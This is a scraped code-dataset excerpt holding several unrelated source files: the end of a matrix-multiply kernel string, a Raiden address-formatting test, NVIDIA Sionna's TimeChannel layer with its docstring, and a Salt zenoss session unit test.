sum = ((ap_int<32>)((A[(i_inner + (i_outer * 16))][(k_inner + (k_outer * 8))] * B[(k_inner + (k_outer * 8))][(j_inner + (j_outer * 32))]) + ((float)sum)));
}
}
C[i_outer][i_inner][j_outer][j_inner] = sum;
}
}
}
}
""" |
raiden/tests/unit/utils/test_formatting.py | tirkarthi/raiden | 2,101 | 12671998 | import os
from eth_utils import to_checksum_address as eth_utils_checksum
from raiden.utils.formatting import to_checksum_address
from raiden.utils.typing import Address
def test_random_addresses():
for _ in range(100):
address_bytes = Address(os.urandom(20))
assert eth_utils_checksum(address_bytes) == to_checksum_address(address_bytes)
|
sionna/channel/time_channel.py | NVlabs/sionna | 163 | 12672006 | #
# SPDX-FileCopyrightText: Copyright (c) 2021-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
"""Layer for implementing the channel in the time domain"""
import tensorflow as tf
from . import GenerateTimeChannel, ApplyTimeChannel
from .utils import time_lag_discrete_time_channel
class TimeChannel(tf.keras.layers.Layer):
# pylint: disable=line-too-long
r"""TimeChannel(channel_model, bandwidth, num_time_samples, maximum_delay_spread=3e-6, l_min=None, l_max=None, normalize_channel=False, add_awgn=True, return_channel=False, dtype=tf.complex64, **kwargs)
Generate channel responses and apply them to channel inputs in the time domain.
This class inherits from the Keras `Layer` class and can be used as layer
in a Keras model.
The channel output consists of ``num_time_samples`` + ``l_max`` - ``l_min``
time samples, as it is the result of filtering the channel input of length
``num_time_samples`` with the time-variant channel filter of length
``l_max`` - ``l_min`` + 1. In the case of a single-input single-output link and given a sequence of channel
inputs :math:`x_0,\cdots,x_{N_B}`, where :math:`N_B` is ``num_time_samples``, this
layer outputs
.. math::
y_b = \sum_{\ell = L_{\text{min}}}^{L_{\text{max}}} x_{b-\ell} \bar{h}_{b,\ell} + w_b
where :math:`L_{\text{min}}` corresponds ``l_min``, :math:`L_{\text{max}}` to ``l_max``, :math:`w_b` to
the additive noise, and :math:`\bar{h}_{b,\ell}` to the
:math:`\ell^{th}` tap of the :math:`b^{th}` channel sample.
This layer outputs :math:`y_b` for :math:`b` ranging from :math:`L_{\text{min}}` to
:math:`N_B + L_{\text{max}} - 1`, and :math:`x_{b}` is set to 0 for :math:`b < 0` or :math:`b \geq N_B`.
The channel taps :math:`\bar{h}_{b,\ell}` are computed assuming a sinc filter
is used for pulse shaping and receive filtering. Therefore, given a channel impulse response
:math:`(a_{m}(t), \tau_{m}), 0 \leq m \leq M-1`, generated by the ``channel_model``,
the channel taps are computed as follows:
.. math::
\bar{h}_{b, \ell}
= \sum_{m=0}^{M-1} a_{m}\left(\frac{b}{W}\right)
\text{sinc}\left( \ell - W\tau_{m} \right)
for :math:`\ell` ranging from ``l_min`` to ``l_max``, and where :math:`W` is
the ``bandwidth``.
For multiple-input multiple-output (MIMO) links, the channel output is computed for each antenna of each receiver and by summing over all the antennas of all transmitters.
Parameters
----------
channel_model : :class:`~sionna.channel.ChannelModel` object
An instance of a :class:`~sionna.channel.ChannelModel`, such as
:class:`~sionna.channel.RayleighBlockFading` or
:class:`~sionna.channel.tr38901.UMi`.
bandwidth : float
Bandwidth (:math:`W`) [Hz]
num_time_samples : int
Number of time samples forming the channel input (:math:`N_B`)
maximum_delay_spread : float
Maximum delay spread [s].
Used to compute the default value of ``l_max`` if ``l_max`` is set to
`None`. If a value is given for ``l_max``, this parameter is not used.
It defaults to 3us, which was found
to be large enough to include most significant paths with all channel
models included in Sionna assuming a nominal delay spread of 100ns.
l_min : int
Smallest time-lag for the discrete complex baseband channel (:math:`L_{\text{min}}`).
If set to `None`, defaults to the value given by :func:`time_lag_discrete_time_channel`.
l_max : int
Largest time-lag for the discrete complex baseband channel (:math:`L_{\text{max}}`).
If set to `None`, it is computed from ``bandwidth`` and ``maximum_delay_spread``
using :func:`time_lag_discrete_time_channel`. If it is not set to `None`,
then the parameter ``maximum_delay_spread`` is not used.
add_awgn : bool
If set to `False`, no white Gaussian noise is added.
Defaults to `True`.
normalize_channel : bool
If set to `True`, the channel is normalized over the block size
to ensure unit average energy per time step. Defaults to `False`.
return_channel : bool
If set to `True`, the channel response is returned in addition to the
channel output. Defaults to `False`.
dtype : tf.DType
Complex datatype to use for internal processing and output.
Defaults to `tf.complex64`.
Input
-----
(x, no) or x:
Tuple or Tensor:
x : [batch size, num_tx, num_tx_ant, num_time_samples], tf.complex
Channel inputs
no : Scalar or Tensor, tf.float
Scalar or tensor whose shape can be broadcast to the shape of the
channel outputs: [batch size, num_rx, num_rx_ant, num_time_samples].
Only required if ``add_awgn`` is set to `True`.
The noise power ``no`` is per complex dimension. If ``no`` is a scalar,
noise of the same variance will be added to the outputs.
If ``no`` is a tensor, it must have a shape that can be broadcast to
the shape of the channel outputs. This allows, e.g., adding noise of
different variance to each example in a batch. If ``no`` has a lower
rank than the channel outputs, then ``no`` will be broadcast to the
shape of the channel outputs by adding dummy dimensions after the last
axis.
Output
-------
y : [batch size, num_rx, num_rx_ant, num_time_samples + l_max - l_min], tf.complex
Channel outputs
The channel output consists of ``num_time_samples`` + ``l_max`` - ``l_min``
time samples, as it is the result of filtering the channel input of length
``num_time_samples`` with the time-variant channel filter of length
``l_max`` - ``l_min`` + 1.
h_time : [batch size, num_rx, num_rx_ant, num_tx, num_tx_ant, num_time_samples + l_max - l_min, l_max - l_min + 1], tf.complex
(Optional) Channel responses. Returned only if ``return_channel``
is set to `True`.
For each batch example, ``num_time_samples`` + ``l_max`` - ``l_min`` time
steps of the channel realizations are generated to filter the channel input.
"""
def __init__(self, channel_model, bandwidth, num_time_samples,
maximum_delay_spread=3e-6, l_min=None, l_max=None,
normalize_channel=False, add_awgn=True, return_channel=False,
dtype=tf.complex64, **kwargs):
super().__init__(trainable=False, dtype=dtype, **kwargs)
# Setting l_min and l_max to default values if not given by the user
l_min_default, l_max_default = time_lag_discrete_time_channel(bandwidth,
maximum_delay_spread)
if l_min is None:
l_min = l_min_default
if l_max is None:
l_max = l_max_default
self._cir_sampler = channel_model
self._bandwidth = bandwidth
self._num_time_steps = num_time_samples
self._l_min = l_min
self._l_max = l_max
self._l_tot = l_max-l_min+1
self._normalize_channel = normalize_channel
self._add_awgn = add_awgn
self._return_channel = return_channel
def build(self, input_shape): #pylint: disable=unused-argument
self._generate_channel = GenerateTimeChannel(self._cir_sampler,
self._bandwidth,
self._num_time_steps,
self._l_min,
self._l_max,
self._normalize_channel)
self._apply_channel = ApplyTimeChannel( self._num_time_steps,
self._l_tot,
self._add_awgn,
tf.as_dtype(self.dtype))
def call(self, inputs):
if self._add_awgn:
x, no = inputs
else:
x = inputs
h_time = self._generate_channel(tf.shape(x)[0])
if self._add_awgn:
y = self._apply_channel([x, h_time, no])
else:
y = self._apply_channel([x, h_time])
if self._return_channel:
return y, h_time
else:
return y
|
tests/unit/modules/test_zenoss.py | babs/salt | 9,425 | 12672007 | import salt.modules.config as config
import salt.modules.zenoss as zenoss
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import MagicMock, call, patch
from tests.support.unit import TestCase
class ZenossTestCase(TestCase, LoaderModuleMockMixin):
"""
Test cases for salt.modules.keystone
"""
def setup_loader_modules(self):
return {
zenoss: {"__salt__": {"config.option": config.option}},
config: {"__opts__": {}},
}
def test_zenoss_session(self):
"""
test zenoss._session when using verify_ssl
"""
zenoss_conf = {
"zenoss": {
"hostname": "https://test.zenoss.com",
"username": "admin",
"password": "<PASSWORD>",
}
}
for verify in [True, False, None]:
zenoss_conf["zenoss"]["verify_ssl"] = verify
if verify is None:
zenoss_conf["zenoss"].pop("verify_ssl")
verify = True
patch_opts = patch.dict(config.__opts__, zenoss_conf)
mock_http = MagicMock(return_value=None)
patch_http = patch("salt.utils.http.session", mock_http)
with patch_http, patch_opts:
zenoss._session()
self.assertEqual(
mock_http.call_args_list,
[
call(
ca_bundle=None,
headers={"Content-type": "application/json; charset=utf-8"},
password="<PASSWORD>",
user="admin",
verify_ssl=verify,
)
],
)
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.